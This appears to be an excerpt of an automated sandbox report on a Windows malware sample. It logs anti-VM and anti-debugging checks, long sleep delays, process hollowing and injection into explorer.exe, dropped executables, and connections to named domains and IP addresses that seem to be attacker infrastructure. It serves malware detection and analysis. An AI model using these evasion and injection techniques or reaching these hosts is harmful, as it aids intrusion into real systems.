                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Windows\explorer.exe TID: 3724Thread sleep time: -690000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exe TID: 5200Thread sleep time: -1200000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\46F.exe TID: 4836Thread sleep time: -700000s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exe TID: 3524Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exe TID: 5604Thread sleep time: -1200000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\9721.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-32305
                Source: C:\Users\user\AppData\Local\Temp\9721.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Local\Temp\46F.exeThread delayed: delay time: 700000
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeThread delayed: delay time: 300000
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 399Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 385Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 825Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 852Jump to behavior
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\A843.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\XandETC.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0388B71C rdtsc 5_2_0388B71C
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _malloc,_malloc,_wprintf,_free,GetAdaptersInfo,_free,_malloc,GetAdaptersInfo,_sprintf,_wprintf,_wprintf,_free,6_2_0040E670
                Source: C:\Users\user\AppData\Local\Temp\9721.exeThread delayed: delay time: 1200000
                Source: C:\Users\user\AppData\Local\Temp\46F.exeThread delayed: delay time: 700000
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeThread delayed: delay time: 300000
                Source: C:\Users\user\AppData\Local\Temp\9721.exeAPI call chain: ExitProcess graph end nodegraph_6-32307
                Source: explorer.exe, 00000003.00000000.552491657.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000003.00000000.552491657.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
                Source: 6E6C.exe, 00000017.00000002.661648739.0000000000615000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@@
                Source: explorer.exe, 00000003.00000000.549064445.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
                Source: 46F.exe, 0000000D.00000002.660779350.00000000006B4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                Source: explorer.exe, 00000003.00000000.552491657.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 46F.exe, 0000000D.00000002.660779350.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW <j%SystemRoot%\system32\mswsock.dll
                Source: 46F.exe, 0000000D.00000002.660779350.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                Source: explorer.exe, 00000003.00000000.555369286.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
                Source: 9721.exe, 00000006.00000002.653103615.0000000000548000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000006.00000003.635247015.00000000005B5000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.653103615.00000000005B4000.00000004.00000020.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.641151077.0000000000632000.00000004.00000020.00020000.00000000.sdmp, 124D.exe, 00000008.00000002.641151077.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 0000000D.00000003.650181194.0000000000697000.00000004.00000020.00020000.00000000.sdmp, 46F.exe, 0000000D.00000002.660779350.0000000000697000.00000004.00000020.00020000.00000000.sdmp, F42F.exe, 0000000F.00000002.652053419.00000000007C5000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.798394056.0000000000755000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000003.657203262.0000000000755000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000014.00000002.798394056.00000000006D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 9721.exe, 00000006.00000002.653103615.00000000005C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 3aHg`_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWH
                Source: 9721.exe, 0000001D.00000002.686758804.0000000000752000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWR@r
                Source: explorer.exe, 00000003.00000000.552491657.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
                Source: F42F.exe, 0000000F.00000002.652053419.0000000000738000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0}%SystemRoot%\system32\mswsock.dll
                Source: 9721.exe, 00000006.00000003.635247015.000000000059A000.00000004.00000020.00020000.00000000.sdmp, 9721.exe, 00000006.00000002.653103615.000000000059A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(R) 82574L Gigabit Network Connection
                Source: 9721.exe, 00000006.00000002.653103615.000000000058F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                Source: 9721.exe, 00000006.00000002.653103615.000000000058F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}"_
                Source: 46F.exe, 00000019.00000002.798522186.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oyTb$
                Source: 46F.exe, 0000000D.00000002.660779350.000000000062E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy
                Source: F42F.exe, 0000000F.00000002.652053419.00000000007C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW$
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_00410160
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,6_2_0040F730
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeFile Volume queried: C:\ FullSizeInformation

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle,6_2_00412220
                Source: C:\Users\user\AppData\Roaming\uwjrhssCode function: 4_2_01E66D98 push dword ptr fs:[00000030h]4_2_01E66D98
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0388A0A3 push dword ptr fs:[00000030h]5_2_0388A0A3
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_03920042 push dword ptr fs:[00000030h]5_2_03920042
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeProcess queried: DebugPort
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00424168 _memset,IsDebuggerPresent,6_2_00424168
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_0042A57A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,6_2_0042A57A
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00447CAC __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,6_2_00447CAC
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_0388B71C rdtsc 5_2_0388B71C
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeMemory allocated: page read and write | page guard
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_004329EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_004329EC
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_004329BB SetUnhandledExceptionFilter,6_2_004329BB

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: C:\Windows\explorer.exeDomain query: toobussy.com
                Source: C:\Windows\explorer.exeNetwork Connect: 104.21.18.99 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 201.124.31.170 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 80.66.203.53 443Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: colisumy.com
                Source: C:\Windows\explorer.exeDomain query: astoriaresidency.com
                Source: C:\Windows\explorer.exeNetwork Connect: 211.168.53.110 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: potunulit.org
                Source: C:\Windows\explorer.exeNetwork Connect: 187.251.132.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 45.9.74.80 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 103.233.24.19 443Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 92.83.236.139 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.231.153.132 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.7 80Jump to behavior
                Source: C:\Windows\explorer.exeNetwork Connect: 190.103.205.174 80Jump to behavior
                Source: C:\Windows\explorer.exeDomain query: shsplatform.co.uk
                Source: C:\Windows\explorer.exeFile created: tgjrhss.3.drJump to dropped file
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and readJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                Source: C:\Users\user\AppData\Local\Temp\9721.exeMemory written: C:\Users\user\AppData\Local\Temp\9721.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeMemory written: C:\Users\user\AppData\Local\Temp\124D.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\46F.exeMemory written: C:\Users\user\AppData\Local\Temp\46F.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeMemory written: C:\Users\user\AppData\Local\Temp\F42F.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeMemory written: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\9721.exeMemory written: C:\Users\user\AppData\Local\Temp\9721.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeMemory written: C:\Users\user\AppData\Local\Temp\6E6C.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\46F.exeMemory written: C:\Users\user\AppData\Local\Temp\46F.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeMemory written: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\3971.exeMemory written: C:\Users\user\AppData\Local\Temp\3971.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeMemory written: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\AB42.exeMemory written: C:\Users\user\AppData\Local\Temp\AB42.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 5_2_03920110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,5_2_03920110
                Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 47C1B14Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uwjrhssThread created: unknown EIP: 4AC1B14Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\4C9F.exeThread created: unknown EIP: 4C319C0
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeSection unmapped: unknown base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\AB42.exeSection unmapped: unknown base address: 400000
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe C:\Users\user\AppData\Local\Temp\9721.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\124D.exeProcess created: C:\Users\user\AppData\Local\Temp\124D.exe C:\Users\user\AppData\Local\Temp\124D.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe C:\Users\user\AppData\Local\Temp\46F.exeJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\F42F.exeProcess created: C:\Users\user\AppData\Local\Temp\F42F.exe C:\Users\user\AppData\Local\Temp\F42F.exeJump to behavior
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe --Task
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\Temp\9721.exe "C:\Users\user\AppData\Local\Temp\9721.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exe"
                Source: C:\Users\user\AppData\Local\Temp\9721.exeProcess created: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe "C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build3.exe"
                Source: C:\Users\user\AppData\Local\Temp\6E6C.exeProcess created: C:\Users\user\AppData\Local\Temp\6E6C.exe C:\Users\user\AppData\Local\Temp\6E6C.exe
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: C:\Users\user\AppData\Local\Temp\46F.exe "C:\Users\user\AppData\Local\Temp\46F.exe" --Admin IsNotAutoStart IsNotTask
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\46F.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\aafg31.exe "C:\Users\user\AppData\Local\Temp\aafg31.exe"
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: C:\Users\user\AppData\Local\Temp\oldplayer.exe "C:\Users\user\AppData\Local\Temp\oldplayer.exe"
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\3971.exeProcess created: C:\Users\user\AppData\Local\Temp\3971.exe C:\Users\user\AppData\Local\Temp\3971.exe
                Source: C:\Users\user\AppData\Local\623f25f4-b030-48f0-b5ce-04f1d0c8fd8b\build2.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exeProcess created: C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe "C:\Users\user\AppData\Local\1276855a-e7ba-481b-bc9d-6b0cdee1a289\9721.exe" --AutoStart
                Source: C:\Users\user\AppData\Local\Temp\AB42.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\oldplayer.exeProcess created: unknown unknown
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: 6_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,6_2_00419F90
                Source: explorer.exe, 00000003.00000000.544785609.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
                Source: explorer.exe, 00000003.00000000.544785609.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.552491657.000000000834F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.549475832.0000000005C70000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: explorer.exe, 00000003.00000000.544785609.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: explorer.exe, 00000003.00000000.544429186.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
                Source: explorer.exe, 00000003.00000000.544785609.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,6_2_0043404A
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,6_2_00438178
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,6_2_00440116
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_004382A2
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: GetLocaleInfoW,_GetPrimaryLen,6_2_0043834F
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,6_2_00438423
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,6_2_004335E7
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: EnumSystemLocalesW,6_2_004387C8
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: GetLocaleInfoW,6_2_0043884E
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,6_2_00432B6D
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,6_2_00437BB3
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: EnumSystemLocalesW,6_2_00437E27
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437E83
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,6_2_00437F00
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,6_2_0042BF17
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,6_2_00437F83
                Source: C:\Users\user\AppData\Local\Temp\9721.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,6_2_00432FAD
                Source: C:\Users\user\AppData\Local\Temp\E3B7.exeQueries volume information: C:\Users\user\AppData\Local\Temp\E3B7.exe VolumeInformation
